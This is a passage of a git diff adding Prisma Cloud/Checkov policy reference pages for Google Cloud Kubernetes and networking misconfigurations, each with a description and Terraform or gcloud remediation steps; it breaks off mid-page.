https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py[CKV_GCP_72] +|MEDIUM + + +|xref:ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc[GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKELegacyInstanceMetadataDisabled.py[CKV_GCP_67] +|MEDIUM + + +|xref:ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc[GCP Kubernetes cluster shielded GKE node with Secure Boot disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py[CKV_GCP_68] +|MEDIUM + + +|xref:ensure-shielded-gke-nodes-are-enabled.adoc[GCP Kubernetes cluster Shielded GKE Nodes feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py[CKV_GCP_71] +|MEDIUM + + +|xref:ensure-the-gke-metadata-server-is-enabled.adoc[The GKE metadata server is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py[CKV_GCP_69] +|LOW + + +|xref:ensure-the-gke-release-channel-is-set.adoc[GCP Kubernetes Engine cluster not using Release Channel for version management] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py[CKV_GCP_70] +|MEDIUM + + +|xref:ensure-use-of-binary-authorization.adoc[GCP Kubernetes Engine Clusters have binary authorization disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py[CKV_GCP_66] +|MEDIUM + + +|xref:manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc[Kubernetes RBAC users are not managed with Google Groups for GKE] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py[CKV_GCP_65] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc new file mode 100644 index 000000000..177806019 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc @@ -0,0 +1,58 @@ +== Kubernetes RBAC users are not managed with Google Groups for GKE + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| afe5614d-a235-4a73-a885-c312aa5619dd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py[CKV_GCP_65] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cluster Administrators should leverage G Suite Groups and Cloud IAM to assign Kubernetes user roles to a collection of users, instead of to individual emails using only Cloud IAM. +On- and off-boarding users is often difficult to automate and prone to error. +Using a single source of truth for user permissions via G Suite Groups reduces the number of locations that an individual must be off-boarded from, and prevents users gaining unique permissions sets that increase the cost of audit. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* authenticator_groups_config.security_group + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + project = data.google_project.project.name + ++ authenticator_groups_config{ ++ security_group="gke-security-groups@yourdomain.com" ++ }", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1.adoc new file mode 100644 index 000000000..29d539ad4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1.adoc @@ -0,0 +1,104 @@ +== GCP Firewall rule allows all traffic on SSH port (22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 49a154e8-6049-4317-bbb5-0c90cb078f94 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py[CKV_GCP_2] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Firewall rules setup fine-grained allow/deny traffic policies to and from a VM. +Enabled rules are always enforced, and help protect instances from unwanted traffic. +Firewall rules are defined at the network level, and only apply to the network where they are created. +Every VPC functions as a distributed firewall. +While firewall rules are defined at the network level, connections are allowed or denied on a per-instance basis. +A default network is pre-populated with firewall rules that allow incoming traffic to instances. +The *default-allow-ssh* rule permits ingress connections on TCP port 22 from any source to any instance in the network. +We recommend you restrict or remove the *default-allow-ssh* rule when you no longer need it. + +//// +=== Fix - Runtime + + +* Procedure* + + + +. List your firewall rules. ++ +You can view a list of all rules or just those in a particular network. + +. Click the rule * default-allow-ssh*. + +. Click * Delete*. + +. Click* Delete** again to confirm. + + +* CLI Command* + + +`gcloud compute firewall-rules delete default-allow-ssh` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_firewall +* *Arguments:* deny. + +The deny block supports: *protocol* (Required) The IP protocol to which this rule applies. +The protocol type is required when creating a firewall rule. +This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, sctp, ipip), or the IP protocol number. +*ports* (Optional) An optional list of ports to which this rule applies. +This field is only applicable for UDP or TCP protocol. +Each entry must be either an integer or a range. +If not specified, this rule applies to connections through any port. +Example inputs include: ["22"], ["80","443"], and ["12345-12349"]. + + +[source,go] +---- +{ + "resource "google_compute_firewall" "default" { + name = "test-firewall" + network = google_compute_network.default.name + + allow { + protocol = "icmp" + } + + + deny { + protocol = "ssh" + ports = ["22"] + } + +}", +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10.adoc new file mode 100644 index 000000000..2c7fdf6bc --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-10.adoc @@ -0,0 +1,123 @@ +== GCP Projects have OS Login disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 82dcb04d-0fae-4d38-9692-fc7dabc0e50c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py[CKV_GCP_34] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling OSLogin ensures that SSH keys used to connect to instances are mapped with IAM users. +Revoking access to IAM user will revoke all the SSH keys associated with that particular user. +It facilitates centralized and automated SSH key pair management. +This is useful in handling cases such as response to compromised SSH key pairs and/or revocation of external/third-party/Vendor users. +We recommend you enable OSLogin to bind SSH certificates to IAM users and facilitates effective SSH certificate management. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/metadata [Metadata]. + +. Click * Edit*. + +. Add a metadata entry where the key is * enable-oslogin* and the value is * TRUE*. + +. To apply changes, click * Save*. + +. For every instances that overrides the project setting, go to the * VM Instances* page at https://console.cloud.google.com/compute/instances. + +. Click the name of the instance on which you want to remove the metadata value. + +. To edit the instance settings go to the top of the instance details page and click * Edit*. + +. Under * Custom metadata*, remove any entry with key * enable-oslogin* and the value is * FALSE*. + +. To apply your changes to the instance, navigate to the bottom of the instance details page and click * Save*. + + +* CLI Command* + + + +. To configure oslogin on the project, use the following command: + +---- +gcloud compute project-info add-metadata --metadata enable-oslogin=TRUE +---- + +. To remove instance metadata that overrides the project setting, use the following command: + +---- +gcloud compute instances remove-metadata INSTANCE_NAME --keys=enable-oslogin +---- + +Optionally, you can enable two factor authentication for OS login. +For more information, see https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_project_metadata +* *Arguments:* enable-oslogin +* *Resource:* google_compute_instance +* *Arguments:* enable-oslogin Should not override project metadata: should not be set to false. + + +[source,go] +---- +{ + "//Option 1 +resource "google_compute_project_metadata" "default" { + metadata = { ++ enable-oslogin = true + } + +} + +//Option 2 +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + metadata = { +- enable-oslogin = false + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11.adoc new file mode 100644 index 000000000..2c09ed122 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-11.adoc @@ -0,0 +1,114 @@ +== GCP VM instances have serial port access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7e6ca7c-8b47-4556-9a34-d2ab88347b4b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py[CKV_GCP_35] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Interacting with a serial port is often referred to as the serial console. +It is similar to using a terminal window: input and output is entirely in text mode with no graphical interface or mouse support. +If the interactive serial console on an instance is enabled, clients can attempt to connect to that instance from any IP address. +For security purposes interactive serial console support should be disabled. +A virtual machine instance has four virtual serial ports. +Interacting with a serial port is similar to using a terminal window: input and output is entirely in text mode with no graphical interface or mouse support. +The instance's BIOS operating system and other system-level entities write output to the serial ports and accept input, for example, commands and responses to prompts. +Typically, these system-level entities use the first serial port (port 1). +Serial port 1 is often referred to as the serial console. +The interactive serial console does not support IP-based access restrictions, for example, an IP whitelist. +If you enable the interactive serial console on an instance, clients can connect to that instance from any IP address. +This allows anybody with the correct SSH key, username, project ID, zone, and instance name to connect to that instance. +To stop this type of access interactive serial console support should be disabled. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to * Computer Engine*. + +. Navigate to * VM instances*. + +. Select the specific VM. + +. Click * Edit*. + +. Clear the checkbox * Enable connecting to serial ports*, located below the * Remote access* block. + +. Click * Save*. + + +* CLI Command* + + +To disable an instance use one of the following commands: + +---- +gcloud compute instances add-metadata INSTANCE_NAME +--zone=ZONE +--metadata=serial-port-enable=false +---- + +OR + +---- +gcloud compute instances add-metadata INSTANCE_NAME +--zone=ZONE +--metadata=serial-port-enable=0 +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Arguments:* serial-port-enable By default set to false. + + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + metadata = { +- serial-port-enable = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12.adoc new file mode 100644 index 000000000..0e46109aa --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-12.adoc @@ -0,0 +1,96 @@ +== GCP VM instances have IP Forwarding enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bb3cb1ba-55f8-4c14-b299-777d7be79697 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py[CKV_GCP_36] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The Compute Engine instance cannot forward a packet unless the source IP address of the packet matches the IP address of the instance. +GCP will not deliver a packet with a destination IP address different to the IP address of the instance receiving the packet. +Both capabilities are required when using instances to help route packets. +To enable this source and destination IP check, disable the *canIpForward* field. +The *canIpForward* field allows an instance to send and receive packets with non-matching destination or source IPs. +We recommend the forwarding of data packets be disabled to prevent data loss and information disclosure. + +//// +=== Fix - Runtime + + +* GCP Console The canIpForward setting can only be edited at instance creation time.* + + +It is recommended to * delete* the instance and * create* a new one with canIpForward set to * False*. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Select the * VM Instance* to remediate. + +. Click * Delete*. + +. On the * VM Instances* page, click * CREATE INSTANCE*. + +. Create a new instance with the desired configuration. ++ +NOTE: By default, a new instance is configured to not allow IP forwarding. + + + +* CLI Command* + + + +. To * delete* an instance, use the following command: `gcloud compute instances delete INSTANCE_NAME` + +. To * create* a new instance to replace it with * IP forwarding set to Off*, use the following command: `gcloud compute instances create` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Arguments:* can_ip_forward By default set to false. + + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" +- can_ip_forward = true +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2.adoc new file mode 100644 index 000000000..e8718d127 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2.adoc @@ -0,0 +1,105 @@ +== GCP Firewall rule allows all traffic on RDP port (3389) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 34175634-0e4a-4e9d-9c77-0c75390b8bdc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py[CKV_GCP_3] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Firewall rules setup fine grained allow/deny traffic policies to and from a virtual machine (VM). +Enabled rules are always enforced, and help protecting instances from unwanted traffic. +Firewall rules are defined at the network level, and only apply to the network where they are created. +Every VPC functions as a distributed firewall. +While firewall rules are defined at the network level, connections are allowed or denied on a per-instance basis. +A default network is pre-populated with firewall rules that allow incoming traffic to instances. +The *default-allow-rdp* rule permits ingress connections on TCP port 3389 from any source to any instance in the network. +We recommend you restrict or remove the *default-allow-rdp* rule when you no longer need it. + +//// +=== Fix - Runtime + + +* Procedure* + + + +. List your firewall rules. ++ +You can view a list of all rules or just those in a particular network. + +. Click the rule "default-allow-rdp" to delete. + +. Click Delete. + +. Click Delete again to confirm. + + +* CLI Command* + + +`gcloud compute firewall-rules delete default-allow-rdp` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_firewall +* *Arguments:* deny. + +The deny block supports: *protocol* (Required) The IP protocol to which this rule applies. +The protocol type is required when creating a firewall rule. +This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, sctp, ipip), or the IP protocol number. +*ports* (Optional) An optional list of ports to which this rule applies. +This field is only applicable for UDP or TCP protocol. +Each entry must be either an integer or a range. +If not specified, this rule applies to connections through any port. +Example inputs include: ["22"], ["80","443"], and ["12345-12349"]. + + +[source,go] +---- +{ + "resource "google_compute_firewall" "default" { + name = "test-firewall" + network = google_compute_network.default.name + + allow { + protocol = "icmp" + } + + + deny { + protocol = "tcp" + ports = ["3389"] + } + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3.adoc new file mode 100644 index 000000000..cf88e159c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-3.adoc @@ -0,0 +1,156 @@ +== GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 513244c1-c014-4f65-9613-247db7c2932a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py[CKV_GCP_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Secure Sockets Layer (SSL) policies determine what port Transport Layer Security (TLS) features clients are permitted to use when connecting to load balancers. +SSL policies control the features of SSL in Google Cloud SSL proxy load balancer and external HTTP(S) load balancers. +By default, HTTP(S) Load Balancing and SSL Proxy Load Balancing use a set of SSL features that provides good security and wide compatibility. +To prevent usage of insecure features, SSL policies should use one of the following three options: + +. At least TLS 1.2 with the MODERN profile; ++ +or + +. The RESTRICTED profile, because it effectively requires clients to use TLS 1.2 regardless of the chosen minimum TLS version; ++ +or + +. A CUSTOM profile that does not support any of the following features: ++ +* TLS_RSA_WITH_AES_128_GCM_SHA256 ++ +* TLS_RSA_WITH_AES_256_GCM_SHA384 ++ +* TLS_RSA_WITH_AES_128_CBC_SHA ++ +* TLS_RSA_WITH_AES_256_CBC_SHA ++ +* TLS_RSA_WITH_3DES_EDE_CBC_SHA ++ +Load balancers are used to efficiently distribute traffic across multiple servers. ++ +Both SSL proxy and HTTPS load balancers are external load balancers: they distribute traffic from the Internet to a GCP network. ++ +GCP customers can configure load balancer SSL policies with a minimum TLS version (1.0, 1.1, or 1.2) that clients can use to establish a connection, along with a profile (Compatible, Modern, Restricted, or Custom) that specifies permissible and insecure cipher suites. ++ +It is easy for customers to configure a load balancer without knowing they are permitting outdated cipher suites. ++ +It is possible to define SSL policies to control the features of SSL that your load balancer negotiates with clients. ++ +An SSL policy can be configured to determine the minimum TLS version and SSL features that are enabled in the load balancer. ++ +We recommend you select TLS 1.2 as the minimum TLS version supported. + +//// +=== Fix - Runtime + + +* GCP Console If the * TargetSSLProxy* or * TargetHttpsProxy* does not have an SSL policy configured, create a new SSL policy.* + + +Otherwise, modify the existing insecure policy. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/net-security/sslpolicies [SSL Policies]. + +. Click on the name of the insecure policy to go to its * SSL policy details* page. + +. Click * EDIT*. + +. Set * Minimum TLS version* to * TLS 1.2*. + +. Set * Profile* to * Modern* or * Restricted*. + +. Alternatively, if the user selects the profile * Custom*, make sure that the following features are disabled: ++ +* TLS_RSA_WITH_AES_128_GCM_SHA256 ++ +* TLS_RSA_WITH_AES_256_GCM_SHA384 ++ +* TLS_RSA_WITH_AES_128_CBC_SHA ++ +* TLS_RSA_WITH_AES_256_CBC_SHA ++ +* TLS_RSA_WITH_3DES_EDE_CBC_SHA + + +* CLI Command* + + + +. For each insecure SSL policy, update it to use secure cyphers: + +---- +gcloud compute ssl-policies update NAME +[--profile COMPATIBLE|MODERN|RESTRICTED|CUSTOM] +--min-tls-version 1.2 [--custom-features FEATURES] +---- + +. If the target proxy has a GCP default SSL policy, use the following command corresponding to the proxy type to update it: + +---- +gcloud compute target-ssl-proxies update TARGET_SSL_PROXY_NAME +--ssl-policy SSL_POLICY_NAME +gcloud compute target-https-proxies update TARGET_HTTPS_POLICY_NAME +--sslpolicy SSL_POLICY_NAME +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_ssl_policy +* *Arguments:* profile = MODERN +* *Resource:* google_compute_ssl_policy +* *Arguments:* profile = CUSTOM custom_features = [] + + +[source,go] +---- +//Option 1 +resource "google_compute_ssl_policy" "modern-profile" { + name = "nonprod-ssl-policy" ++ profile = "MODERN" ++ min_tls_version = "TLS_1_2" +} + +//Option 2 +resource "google_compute_ssl_policy" "custom-profile" { + name = "custom-ssl-policy" ++ profile = "CUSTOM" + min_tls_version = "TLS_1_2" ++ custom_features = ["TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4.adoc new file mode 100644 index 000000000..1b0225520 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-4.adoc @@ -0,0 +1,132 @@ +== GCP SQL database is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b024e482-2425-4fa4-80b2-9c386879cea3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py[CKV_GCP_11] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL, and SQL Server. +It offers data encryption at rest and in transit, Private connectivity with VPC and user-controlled network access with firewall protection. +It is possible to configure Cloud SQL to have a public IPv4 address. +This means your cluster can accept connections from specific IP addresses, or a range of addresses, by adding authorized addresses to your instance. +We do not recommend this option. +We recommend you ensure Cloud SQL Database Instances are not publicly accessible, to help secure against attackers scanning the internet in search of public databases. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to the Cloud SQL Instances page. + +. Click the instance name to open its Overview page. + +. Select the * Connections* tab. + +. Select * Private IP* checkbox. + +. A drop-down list shows the available networks in your project. ++ +If your project is the service project of a Shared VPC, VPC networks from the host project are also shown. ++ +If you have configured private services access: Select the VPC Network you want to use + +. A drop-down shows the IP address range you allocated. + +. Click * Connect*. + +. Click * Save*. ++ +To let Cloud SQL allocate an IP address for you. + +. Select the default VPC network. + +. Click * Allocate and connect*. + +. Click * Save*. + + +* CLI Command* + + +VPC_NETWORK_NAME is the name of your chosen VPC network, for example: my-vpc-network. +The --network parameter value is in the format: https://www.googleapis.com/compute/alpha/projects/ [PROJECT_ID]/global/networks/[VPC_NETWORK_NAME] + + +[source,shell] +---- +{ + "gcloud --project=[PROJECT_ID] beta sql instances patch [INSTANCE_ID] + --network=[VPC_NETWORK_NAME] + --no-assign-ip", +} +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_network +* *Arguments:* private_network (Optional) The VPC network from which the Cloud SQL instance is accessible for private IP. + +For example, projects/myProject/global/networks/default. +Specifying a network enables private IP. +Either ipv4_enabled must be enabled or a private_network must be configured. +This setting can be updated, but it cannot be removed after it is set. + + +[source,go] +---- +{ + "resource "google_compute_network" "private_network" { + provider = google-beta + + name = "private-network" +} + + +resource "google_compute_global_address" "private_ip_address" { + provider = google-beta + + name = "private-ip-address" + purpose = "VPC_PEERING" + address_type = "INTERNAL" + prefix_length = 16 + network = google_compute_network.private_network.id +}", + + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5.adoc new file mode 100644 index 000000000..2920d5ac8 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5.adoc @@ -0,0 +1,84 @@ +== GCP Cloud DNS has DNSSEC disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3fe0c24e-7e74-44b3-bbda-b3e68fb55f6c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py[CKV_GCP_16] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +DNSSEC is a feature of the Domain Name System that authenticates responses to domain name lookups. +DNSSEC prevents attackers from manipulating or poisoning the responses to DNS requests. +We recommend you ensure DNSSEC is enabled in: any public DNS zone, the top level domain registry, and in the local DNS resolvers. + +NOTE: If *visibility* is set to *private*, then DNSSEC cannot be set, and this policy will pass. + + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Click the DNSSEC setting for the existing managed zone. + +. Select "On" in the pop-up menu. + +. In the confirmation dialog, click * Enable*. + + +* CLI Command* + + +You can enable DNSSEC for existing managed zones using the gcloud command line tool or the API: `gcloud dns managed-zones update EXAMPLE_ZONE --dnssec-state on` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dns_managed_zone +* *Arguments:* dnssec_config (Optional) DNSSEC configuration Structure is documented below. + + +[source,go] +---- +{ + "resource "google_dns_managed_zone" "example" { + description = "Company Domain name" + dns_name = "example.com." + + + dnssec_config { # forces replacement + + kind = "dns#managedZoneDnsSecConfig" # forces replacement + + non_existence = "nsec3" # forces replacement + + state = "on" # forces replacement", +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6.adoc new file mode 100644 index 000000000..a322cfb6e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-6.adoc @@ -0,0 +1,68 @@ +== RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aecd368d-a818-4928-821f-2e7e991260d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py[CKV_GCP_17] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +DNSSEC is a feature of the Domain Name System (DNS) that authenticates responses to domain name lookups. +There are several advanced DNSSEC configuration options you can use if DNSSEC is enabled for your managed zones. +These include: unique signing algorithms, denial of existence and the ability to use record types that require or recommend DNSSEC for their use. +When enabling DNSSEC for a managed zone, or creating a managed zone with DNSSEC, you can select the DNSSEC signing algorithms and the denial-of-existence type. +We do not recommend you use RSASHA1 unless you need it for compatibility reasons; +there is no security advantage to using it with larger key lengths. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dns_managed_zone +* *Arguments:* *zone_signing_keys* - A list of Zone-signing key (ZSK) records. + +Structure is documented below. +*key_signing_keys* - A list of Key-signing key (KSK) records. +Structure is documented below. +Additionally, the DS record is provided: The *key_signing_keys* and *zone_signing_keys* block supports: algorithm - String mnemonic specifying the DNSSEC algorithm of this key. +Immutable after creation time. +Possible values are ecdsap256sha256, ecdsap384sha384, rsasha1, rsasha256, and rsasha512. + + +[source,go] +---- +{ + "resource "google_dns_managed_zone" "foo" { + name = "foobar" + dns_name = "foo.bar." + + zone_signing_keys { +- algorithm = "rsasha1" + } + +", +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-7.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-7.adoc new file mode 100644 index 000000000..61f308565 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-7.adoc @@ -0,0 +1,96 @@ +== GCP Kubernetes Engine Clusters using the default network + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8212ac16-362c-4555-b182-76e9963434fb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py[CKV_GCP_27] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The default network has a pre-configured network configuration and automatically generates the following insecure firewall rules: + +* *default-allow-internal*: Allows ingress connections for all protocols and ports among instances in the network. +* *default-allow-ssh*: Allows ingress connections on TCP port 22(SSH) from any source to any instance in the network. +* *default-allow-rdp*: Allows ingress connections on TCP port 3389(RDP) from any source to any instance in the network. +* *default-allow-icmp*: Allows ingress ICMP traffic from any source to any instance in the network. +These automatically created firewall rules do not get audit logged and cannot be configured to enable firewall rule logging. + +In addition, the default network is an auto mode network, which means that its subnets use the same predefined range of IP addresses. + +As a result, it is not possible to use Cloud VPN or VPC Network Peering with the default network. +We recommend that a project should not have a default network to prevent use of default network. +Based on organization security and networking requirements, the organization should create a new network and delete the default network. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/networking/networks/list [VPC networks]. + +. Click the network named * default*. + +. On the network detail page, click * EDIT*. + +. Click * DELETE VPC NETWORK*. + +. If needed, create a new network to replace the default network. + + +* CLI Command* + + +For each Google Cloud Platform project: + +. Delete the default network: `gcloud compute networks delete default` + +. If needed, create a new 